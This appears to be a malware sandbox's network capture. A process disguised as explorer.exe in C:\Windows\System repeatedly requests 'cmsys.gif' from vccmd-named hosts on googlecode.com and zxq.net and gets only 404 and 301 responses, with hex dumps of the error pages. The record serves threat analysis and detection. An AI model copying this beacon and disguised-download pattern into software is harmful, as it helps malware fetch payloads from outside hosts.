                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    14192.168.2.549746142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:21.297535896 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.222368002 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:22 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.222939968 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    15192.168.2.54976751.81.194.202802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.002243042 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.699901104 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:08:25 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    16192.168.2.54978564.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:27.975368023 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:28.899828911 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:28 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:28.899914980 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    17192.168.2.549801108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:30.242806911 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:31.149817944 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:31 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:31.149832964 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    18192.168.2.560454142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:33.019639015 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:33.957818031 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:33 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:33.958309889 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    19192.168.2.56047951.81.194.202802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.321293116 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.024394989 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:08:37 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:48.556803942 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:48.736167908 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:08:48 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.802643061 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.982187986 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:08:57 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
